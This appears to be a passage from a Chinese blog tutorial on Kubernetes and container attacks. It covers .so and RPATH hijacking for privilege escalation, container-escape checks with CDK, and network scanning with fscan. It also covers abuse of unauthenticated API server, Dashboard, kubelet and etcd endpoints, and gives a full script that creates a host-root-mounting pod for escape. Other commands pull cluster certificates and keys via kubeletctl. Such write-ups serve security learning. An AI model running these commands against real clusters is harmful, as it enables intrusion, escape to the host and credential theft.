<h4 id="crontab提权"><a href="#crontab提权" class="headerlink" title="crontab提权"></a><strong>crontab提权</strong></h4><p>定时任务在容器里面比较场景，可能我们需要定时去执行某些任务，但是由于so依赖的问题，可能这个定时任务脚本用户不一定有权限修改，但是他依赖的so用户是可以修改的，那么我们可以通过so劫持，当下次定时任务执行的时候，他依赖的恶意so会反弹shell，导致提权<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311958-dedbd10c-8ca0-4637-afa7-129a048b2f80.png#averageHue=%2321201c&clientId=ud34a835a-3864-4&from=paste&id=u1f12dcfb&originHeight=196&originWidth=904&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u89f1930c-ba95-4cff-a764-2ea2b08ba20&title="></p>
<h4 id="RPATH提权"><a href="#RPATH提权" class="headerlink" title="RPATH提权"></a><strong>RPATH提权</strong></h4><p>RPATH全称是run-time search path它规定了可执行文件在寻找.so文件时的第一优先位置,如果RPATH配置不当，也会导致跟上面crontab提权类似的场景，因为有些应用是root服务启动的，比如说一些监控应用，这些服务大概率会伴随着系统重启而自动运行，那么我们通过RPATH劫持NEEDED的so，达到提权的效果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">readelf -d binary_path|egrep &#x27;NEEDED|RPATH&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701173936791-a3abba12-0b03-43a2-b539-e119527a2e3b.png#averageHue=%232a2523&clientId=ud9aab05d-6b0a-4&from=drop&id=u2a7e38a2&originHeight=526&originWidth=2548&originalType=binary&ratio=2&rotation=0&showTitle=false&size=971598&status=done&style=none&taskId=u7b9ac1eb-1cb3-44bb-9532-21897885b46&title=" alt="截屏2023-11-28 20.18.13.png"></p>
<h3 id="容器逃逸"><a href="#容器逃逸" class="headerlink" title="容器逃逸"></a><strong>容器逃逸</strong></h3><p>容器逃逸具体的一些常见的攻击手法可以参考上一篇文章，这里主要是介绍实际当中我们如何去发现可以逃逸的点</p>
<h4 id="linpeas-1"><a href="#linpeas-1" class="headerlink" title="linpeas"></a><strong>linpeas</strong></h4><p>在提权部分介绍的工具在容器逃逸的场景也适用，他也会做一些跟逃逸有关的检查，比如说他会去帮我们查看Cap权限，帮我们查看mount的信息等等</p>
<h4 id="CDK"><a href="#CDK" class="headerlink" title="CDK"></a><strong>CDK</strong></h4><p><a target="_blank" rel="noopener" href="https://github.com/cdk-team/CDK">https://github.com/cdk-team/CDK</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./cdk eva --full</span><br></pre></td></tr></table></figure>
<p>cdk也是一款很厉害的逃逸检查工具，之前使用它成功检测出docker.sock挂载逃逸</p>
<h4 id="大权限的service-account"><a href="#大权限的service-account" class="headerlink" title="大权限的service account"></a><strong>大权限的service account</strong></h4><p>由于k8s默认会挂载service account,在一般场景里面，只有kube-system里面的pod挂载的account为大权限，普通的pod里面的都是小权限<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312002-02cdfb44-0cf7-42b7-b935-22361f7f8221.png#averageHue=%23252422&clientId=ud34a835a-3864-4&from=paste&id=ufa4fd988&originHeight=221&originWidth=1335&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u19f11ebb-04ea-4844-834a-bd7dfd0e2dd&title="><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311959-7eeb0984-d0a4-4333-a180-6c38bdcb8a5f.png#averageHue=%23eedfc2&clientId=ud34a835a-3864-4&from=paste&id=u74f6d08b&originHeight=321&originWidth=2970&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u54243b15-28d9-4e46-9f0b-c21e8c7d1ae&title="><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311968-37cb1474-2130-46a2-9c04-40a26599c748.png#averageHue=%23272321&clientId=ud34a835a-3864-4&from=paste&id=uad6272a7&originHeight=170&originWidth=2768&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uafa78859-7c4f-4a17-822e-54c83bd9c82&title="><br>但实际场景可能不小心给这个service account设置了大权限，所以如果看到挂载的token，可以先试一下～</p>
<h2 id="横向攻击"><a href="#横向攻击" class="headerlink" title="横向攻击"></a><strong>横向攻击</strong></h2><p>在很多场景里，容器层面加固其实做的还不错，可能没有给容器挂载比较敏感内容，没有赋予危险的Cap，导致我们可能纵向攻击一整个失败。那么不要灰心，我们直接来进行横向攻击。<br>横向攻击主要涉及的是网络隔离的问题，大多数时候，业务方可能不会主动去做网络隔离，因为网络隔离会使运维等等一些操作十分不方便，并且网络隔离做起来也十分麻烦，因为有些链路需要保证畅通，有些不必要的可以隔离。</p>
<h3 id="扫描网段"><a href="#扫描网段" class="headerlink" title="扫描网段"></a>扫描网段</h3><p>那么横向攻击第一步要考虑的是，打什么，我怎么知道要扫哪些ip段<br>可以通过下面几个配置来查看</p>
<ul>
<li>环境变量里的主机ip网段</li>
<li>&#x2F;etc&#x2F;hosts里的网段</li>
<li>&#x2F;etc&#x2F;resolv.conf里的网段</li>
</ul>
<p>知道要打的ip段，那么我把ip段分为，k8s ip段和业务ip段</p>
<h3 id="k8s"><a href="#k8s" class="headerlink" title="k8s"></a><strong>k8s</strong></h3><p>通常pod里面的环境变量会保存api server的ip，那么我们可以扫描api server这一网段的ip来发现有没有可以利用的服务<br>工具就使用fscan就好</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fscan -h 172.17.0.0/16</span><br></pre></td></tr></table></figure>
<p>一般k8s默认做了鉴权，所以我们访问也不能像普通访问web一样，那么这里我先介绍k8s常见的两种认证方式的使用访问</p>
<h4 id="认证"><a href="#认证" class="headerlink" title="认证"></a><strong>认证</strong></h4><h5 id="token认证"><a href="#token认证" class="headerlink" title="token认证"></a><strong>token认证</strong></h5><p>k8s默认会挂载serviceaccount,可以在下面两个位置发现，他的值是BASE64编码的结果<br>&#x2F;var&#x2F;run&#x2F;secrets&#x2F;kubernetes.io&#x2F;serviceaccount&#x2F;token<br>&#x2F;run&#x2F;secrets&#x2F;kubernetes.io&#x2F;serviceaccount&#x2F;token<br>实际不一定有kubectl命令，我们可以通过curl访问<br>这里具体访问的url可以通过在我们本地的k8s环境里面获得</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl get pods -A -v=8</span><br></pre></td></tr></table></figure>
<p>在返回内容里面我们可以看到请求的具体uri</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">TOKEN=&quot;eyJhbG&quot;</span><br><span class="line">curl -ivk  -H &quot;Authorization: Bearer $TOKEN&quot; https://192.168.0.222:6443/api/v1/pods?limit=500</span><br></pre></td></tr></table></figure>
<p>当然我们也可以上传一个kubectl,然后配置一个kubeconfig,这里面users的name是随便取的，只需要修改token即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">apiVersion: v1</span><br><span class="line">clusters:</span><br><span class="line">- cluster:</span><br><span class="line">    insecure-skip-tls-verify: true</span><br><span class="line">    server: https://192.168.2.129:6443</span><br><span class="line">  name: kubernetes</span><br><span class="line">contexts:</span><br><span class="line">- context:</span><br><span class="line">    cluster: kubernetes</span><br><span class="line">    user: admin</span><br><span class="line">  name: admin</span><br><span class="line">current-context: admin</span><br><span class="line">kind: Config</span><br><span class="line">preferences: &#123;&#125;</span><br><span class="line">users:</span><br><span class="line">- name: admin</span><br><span class="line">  user:</span><br><span class="line">    token:</span><br></pre></td></tr></table></figure>
<p>然后正常输入命令即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl --kubeconfig=config.yaml get pods -A</span><br></pre></td></tr></table></figure>
<h5 id="证书认证"><a href="#证书认证" class="headerlink" title="证书认证"></a><strong>证书认证</strong></h5><p>在$HOME&#x2F;.kube&#x2F;config里面会保存着k8s的配置文件，如果有kubectl命令就直接正常运行即可，但如果没有kubectl的话，可以使用curl</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat /root/.kube/config|grep certificate-authority-data|awk &#x27;&#123; print $2&#125;&#x27;|base64 -d &gt; ca.crt</span><br><span class="line">cat /root/.kube/config|grep client-certificate-data|awk &#x27;&#123; print $2&#125;&#x27;|base64 -d &gt;client.crt</span><br><span class="line">cat /root/.kube/config|grep client-key-data|awk &#x27;&#123; print $2&#125;&#x27;|base64 -d &gt;client.key</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --cacert ca.crt --cert client.crt  --key client.key https://192.168.0.222:6443/api/v1/pods?limit=500</span><br></pre></td></tr></table></figure>
<p>当然大家可能还是都先麻烦，所以还是直接下个kubectl吧<br><a target="_blank" rel="noopener" href="https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux">https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux</a></p>
<h4 id="api-server未授权"><a href="#api-server未授权" class="headerlink" title="api server未授权"></a><strong>api server未授权</strong></h4><h5 id="http"><a href="#http" class="headerlink" title="http"></a><strong>http</strong></h5><p>API Server是集群控制核心，各组件通过API Server进行交互<br>在新版本k8s中，8080的http默认不启动，如果用户在&#x2F;etc&#x2F;kubernetes&#x2F;manifests&#x2F;kube-apiserver.yaml中把–insecure-port&#x3D;0改为–insecure-port&#x3D;8080并重启API server(最新版本没有insecure-port，加上就好)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">- --insecure-port=8080</span><br><span class="line">    - --insecure-bind-address=0.0.0.0</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systemctl daemon-reload</span><br><span class="line">systemctl restart kubelet</span><br></pre></td></tr></table></figure>
<p>到达8080的请求将绕过所有认证和授权模块<br>因为不需要认证，我们直接创建一个挂载宿主机根目录的pod即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/bash</span><br><span class="line"></span><br><span class="line">cat &lt;&lt; EOF &gt; escape.yaml</span><br><span class="line">apiVersion: v1</span><br><span class="line">kind: Pod</span><br><span class="line">metadata:</span><br><span class="line">  name: attacker</span><br><span class="line">spec:</span><br><span class="line">  containers:</span><br><span class="line">  - name: ubuntu</span><br><span class="line">    image: ubuntu:latest</span><br><span class="line">    imagePullPolicy: IfNotPresent</span><br><span class="line">    # Just spin &amp; wait forever</span><br><span class="line">    command: [ &quot;/bin/bash&quot;, &quot;-c&quot;, &quot;--&quot; ]</span><br><span class="line">    args: [ &quot;while true; do sleep 30; done;&quot; ]</span><br><span class="line">    volumeMounts:</span><br><span class="line">    - name: escape-host</span><br><span class="line">      mountPath: /host-escape-door</span><br><span class="line">  volumes:</span><br><span class="line">    - name: escape-host</span><br><span class="line">      hostPath:</span><br><span class="line">        path: /</span><br><span class="line">EOF</span><br><span class="line"></span><br><span class="line">kubectl -s 127.0.0.1:8080 apply -f escape.yaml</span><br><span class="line">sleep 8</span><br><span class="line">kubectl -s 127.0.0.1:8080 exec -it attacker /bin/bash</span><br></pre></td></tr></table></figure>
<p>上面是创建了一个pod，也可以创建一个Deployment,同样还是直接apply -f 即可</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">apiVersion:</span> <span class="string">apps/v1</span></span><br><span class="line"><span class="attr">kind:</span> <span class="string">Deployment</span></span><br><span class="line"><span class="attr">metadata:</span></span><br><span class="line">  <span class="attr">name:</span> <span class="string">ubuntu-deployment</span></span><br><span class="line"><span class="attr">spec:</span></span><br><span class="line">  <span class="attr">replicas:</span> <span class="number">1</span></span><br><span class="line">  <span class="attr">selector:</span></span><br><span class="line">    <span class="attr">matchLabels:</span></span><br><span class="line">      <span class="attr">app:</span> <span class="string">ubuntu</span></span><br><span class="line">  <span class="attr">template:</span></span><br><span class="line">    <span class="attr">metadata:</span></span><br><span class="line">      <span class="attr">labels:</span></span><br><span class="line">        <span class="attr">app:</span> <span class="string">ubuntu</span></span><br><span class="line">    <span class="attr">spec:</span></span><br><span class="line">      <span class="attr">containers:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">ubuntu</span></span><br><span class="line">        <span class="attr">image:</span> <span class="string">ubuntu:latest</span></span><br><span class="line">        <span class="attr">imagePullPolicy:</span> <span class="string">IfNotPresent</span></span><br><span class="line">        <span class="attr">command:</span> [ <span class="string">&quot;/bin/bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;--&quot;</span> ]</span><br><span class="line">        <span class="attr">args:</span> [ <span class="string">&quot;while true; do sleep 30; done;&quot;</span> ]</span><br><span class="line">        <span class="attr">volumeMounts:</span></span><br><span class="line">        <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">escape-host</span></span><br><span class="line">          <span class="attr">mountPath:</span> <span class="string">/host-escape-door</span></span><br><span class="line">      <span class="attr">volumes:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">escape-host</span></span><br><span class="line">        <span class="attr">hostPath:</span></span><br><span class="line">            <span class="attr">path:</span> <span class="string">/</span></span><br></pre></td></tr></table></figure>
<h5 id="https"><a href="#https" class="headerlink" title="https"></a><strong>https</strong></h5><p>一般来说https不存在未授权，但如果这样配置之后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous</span><br></pre></td></tr></table></figure>
<p>相当于就让匿名用户获得了cluster-admin的权限，这种在实际场景里面比较少见，一定不能这样配置<br>这样配置就会导致你命用户也可以获取所有的资源<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312522-784edcc9-f934-4330-8843-06a7315affd3.png#averageHue=%23e8e8ed&clientId=ud34a835a-3864-4&from=paste&id=u89205c26&originHeight=1034&originWidth=1500&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u867c148e-38c7-436a-8c2f-120e60bcf2c&title="></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl --insecure-skip-tls-verify -s https://192.168.2.129:6443 get pods -A</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312537-a80895e3-69ba-43a5-ae3d-1feab3f3ab10.png#averageHue=%231f1e1d&clientId=ud34a835a-3864-4&from=paste&id=u571478a7&originHeight=629&originWidth=1973&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ub0731869-abc4-4fbb-a4d8-966565fe182&title="></p>
<h4 id="Dashboard未授权"><a href="#Dashboard未授权" class="headerlink" title="Dashboard未授权"></a><strong>Dashboard未授权</strong></h4><p>从1.10.1版本起，dashboard默认禁用了跳过按钮，然而用户在运行Dashboard添加了–enable-skip-login,那么攻击者就可以点击跳过登录Dashborard<br>而使用recommended.yaml创建的Dashboard是可靠的，即使跳过也无法操作<br>我们找到一个老一点版本的Dashboard</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/kubernetes/dashboard/blob/v1.10.0/src/deploy/alternative/kubernetes-dashboard.yaml</span><br></pre></td></tr></table></figure>
<p>修改配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl -n kube-system edit service kubernetes-dashboard</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312630-303ae70c-4483-477b-9ecc-86161113279d.png#averageHue=%231c1c1c&clientId=ud34a835a-3864-4&from=paste&id=u61afef34&originHeight=626&originWidth=1031&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u027ae96f-f3f5-4edf-a512-0adc206f252&title="><br>改成NodePort<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312584-ea74c7d8-720b-4e10-921a-34abfd211082.png#averageHue=%2321201f&clientId=ud34a835a-3864-4&from=paste&id=ub57addff&originHeight=623&originWidth=779&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u45a70f67-45b3-47b5-9746-f384810a9ee&title="><br>查看对应的dashboard端口,可以看到是32055<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312627-96c09b13-10fd-42c4-896c-f63c2eda73af.png#averageHue=%232a2826&clientId=ud34a835a-3864-4&from=paste&id=u408ae4a4&originHeight=246&originWidth=1987&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u261fb7b0-bd35-42e6-ab40-da29c5aebc1&title="><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313199-ff02cac2-2239-40a5-af38-d345c834d673.png#averageHue=%23d4ad73&clientId=ud34a835a-3864-4&from=paste&id=u34f4bc8f&originHeight=1932&originWidth=4062&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u2661ec20-00e8-4f25-9ee7-c0a68fe238b&title="><br>可以看到直接就匿名登录进来了，这里面我们就可以创建一个挂载宿主机根目录的容器进行逃逸，也可以直接从容器组里面访问容器执行命令<br>由于默认权限下dashboard的权限比较低，我们测试的时候修改成超级权限，当然实际业务不要这样做</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kubectl delete rolebinding kubernetes-dashboard-minimal -n kube-system</span><br><span class="line">kubectl create clusterrolebinding dashboard-cluster-admin  --clusterrole=cluster-admin --serviceaccount=kube-system:kubernetes-dashboard</span><br></pre></td></tr></table></figure>
<h4 id="kubelet未授权"><a href="#kubelet未授权" class="headerlink" title="kubelet未授权"></a><strong>kubelet未授权</strong></h4><h5 id="10250"><a href="#10250" class="headerlink" title="10250"></a>10250</h5><p>kubelet是节点代理，负责向API Server注册所在节点,kubelet同样运行API服务，默认在10250,其他组件可以通过调用API改变集群状态<br>&#x2F;var&#x2F;lib&#x2F;kubelet&#x2F;config.yaml<br>一般会把anounymou-auth设为false,即禁止匿名用户访问<br>并authroization设置mode为webhook,使kubelet通过API Server进行授权（即使匿名用户可以访问，也没有任何权限）<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313175-5569d599-bade-4422-8ece-085974413fd6.png#averageHue=%231f1f1e&clientId=ud34a835a-3864-4&from=paste&id=u5f4026e4&originHeight=797&originWidth=917&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uac59b7b0-58c9-4585-a535-9ac9695d8b3&title="><br>这个时候没有认证是无法使用的<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313226-6f792d2e-d1ea-4295-9b97-0ff2065fd8d8.png#averageHue=%23e6d088&clientId=ud34a835a-3864-4&from=paste&id=ufd487231&originHeight=700&originWidth=1812&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u13f9f848-aa7b-48f2-9c33-db0ede6747d&title="><br>如果设置anonymous-enabled为true,webhook-enabled为false,并且authorization-mode为AlawaysAllow<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313225-9b68a239-7f00-4052-b92e-ccace29a0ad5.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=u17e57654&originHeight=531&originWidth=748&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u0031ba93-1c78-48bc-adf7-6551275ffa1&title="><br>修改完以后重启</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl restart kubelet</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313215-53f04941-5091-4e5f-bb81-18eb4f61962a.png#averageHue=%23e8e8ed&clientId=ud34a835a-3864-4&from=paste&id=u45e69f8b&originHeight=1789&originWidth=2362&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u17dfaff6-26e5-4662-9c93-452f8db99da&title="><br>这个时候我们可以先下载一个kubeletctl</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https://github.com/cyberark/kubeletctl/releases/download/v1.8/kubeletctl_linux_amd64 -Lo kubeletctl</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./kubeletctl pods -s 192.168.2.129 -i #加上-i忽略本身的配置文件</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313665-b1045b31-107f-4a54-ac60-7177f3bf918f.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=ua4606656&originHeight=1129&originWidth=2016&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u6665feb2-ca8e-4bb3-a456-981ec302afe&title="><br>我们在kube-apiserver-ubuntu上执行命令读取配置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./kubeletctl run &quot;cat /etc/kubernetes/pki/ca.crt&quot; -p kube-apiserver-ubuntu  -c kube-apiserver -n kube-system -s 192.168.2.129 -i &gt;ca.crt</span><br><span class="line">./kubeletctl run &quot;cat /etc/kubernetes/pki/apiserver-kubelet-client.crt&quot; -p kube-apiserver-ubuntu  -c kube-apiserver -n kube-system -s 192.168.2.129 -i &gt;apiserver-kubelet-client.crt</span><br><span class="line">./kubeletctl run &quot;cat /etc/kubernetes/pki/apiserver-kubelet-client.key&quot; -p kube-apiserver-ubuntu  -c kube-apiserver -n kube-system -s 192.168.2.129 -i &gt;apiserver-kubelet-client.key</span><br></pre></td></tr></table></figure>
<p>获得到key之后运行命令,这之前需要删除一下旧的~&#x2F;.kube&#x2F;config</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mv ~/.kube/config ~/.kube/config.bk</span><br><span class="line">kubectl --server=https://192.168.2.129:6443 --certificate-authority=./ca.crt --client-certificate=./apiserver-kubelet-client.crt --client-key=./apiserver-kubelet-client.key get pods</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313724-fb8b6d58-41d5-499a-96f0-ee383a14231b.png#averageHue=%23201f1e&clientId=ud34a835a-3864-4&from=paste&id=ua2a375ba&originHeight=621&originWidth=3088&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u14c67764-f228-470f-ae4c-915efa24736&title="><br>接下来我们按照之前的攻击手法，创建一个挂载根目录的容器进行逃逸</p>
<h5 id="10255"><a href="#10255" class="headerlink" title="10255"></a>10255</h5><p>kubelet 10255只读端口，用于查询pods信息，但这些信息中会包含环境变量等敏感信息<br><a target="_blank" rel="noopener" href="http://110.89.241.209:10255/pods">http://ip:10255/pods</a><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701176488832-347556eb-e397-42d1-83ad-2ea67ac5cd87.png#averageHue=%23f7f7f7&clientId=ubcbefb06-20fd-4&from=drop&id=u53a61372&originHeight=1256&originWidth=1504&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1166100&status=done&style=none&taskId=u949ac36c-c04d-4b5a-b28d-9b321f186ac&title=" alt="截屏2023-11-28 21.01.24.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701176522448-a5556885-fbde-441f-9763-93e6c74c9ce6.png#averageHue=%23f9f9f9&clientId=ubcbefb06-20fd-4&from=drop&id=u7f786c53&originHeight=1350&originWidth=870&originalType=binary&ratio=2&rotation=0&showTitle=false&size=706479&status=done&style=none&taskId=udcb624b0-2e6f-404b-8ca6-2b453ede374&title=" alt="截屏2023-11-28 21.01.57.png"><br><a target="_blank" rel="noopener" href="http://110.89.241.209:10255/pods">http://ip:10255/</a>metrics 还有一个metrics，不过还是pods里面敏感信息多</p>
<h4 id="etcd未授权"><a href="#etcd未授权" class="headerlink" title="etcd未授权"></a><strong>etcd未授权</strong></h4><p>etcd分为v2和v3协议，使用的存储方式完全不同，所以两个版本的数据并不兼容，对外提供的接口也是不一样的，不同版本的数据是相互隔离的</p>
<h5 id="v2"><a href="#v2" class="headerlink" title="v2"></a>v2</h5><p>可以直接用http的方式访问<br><a target="_blank" rel="noopener" href="http://ip:2379/v2/keys/?recursive=true">http://ip:2379/v2/keys/?recursive=true</a><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701223118384-1a88b938-c822-4b8a-8858-fde0869d5d84.png#averageHue=%23fbfbfb&clientId=u847a9022-aef9-4&from=drop&id=u4b1f03f7&originHeight=1412&originWidth=1822&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1421531&status=done&style=none&taskId=uf61192b2-adf0-4acc-84cd-ba320fb286a&title=" alt="截屏2023-11-29 09.58.34.png"><br>可以看到对应的key和value</p>
<h5 id="v3"><a href="#v3" class="headerlink" title="v3"></a>v3</h5><p>这里我们需要使用etcdctl工具<br>只列出key</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./etcdctl --endpoints=http:<span class="comment">//ip:2379/ get / --prefix  --keys-only</span></span><br></pre></td></tr></table></figure>
<p>列出key和对应的value</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">./etcdctl</span> <span class="string">--endpoints=http://ip:2379/</span> <span class="string">get</span> <span class="string">/</span> <span class="string">--prefix</span></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701177195497-13af6434-324f-4df4-ba9d-f94299cdd969.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=uee84d942&originHeight=866&originWidth=1682&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1884131&status=done&style=none&taskId=u2ee7e4c7-9ccb-4920-8325-fd25b8597b4&title=" alt="截屏2023-11-28 21.13.09.png"></p>
<h4 id="k8s挂载-var-log逃逸"><a href="#k8s挂载-var-log逃逸" class="headerlink" title="k8s挂载&#x2F;var&#x2F;log逃逸"></a><strong>k8s挂载&#x2F;var&#x2F;log逃逸</strong></h4><p>要满足以下条件</p>
<ul>
<li>挂载了&#x2F;var&#x2F;log</li>
<li>容器是在一个 k8s 的环境中</li>
<li>当前 pod 的 serviceaccount 拥有 get|list|watch log 的权限<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 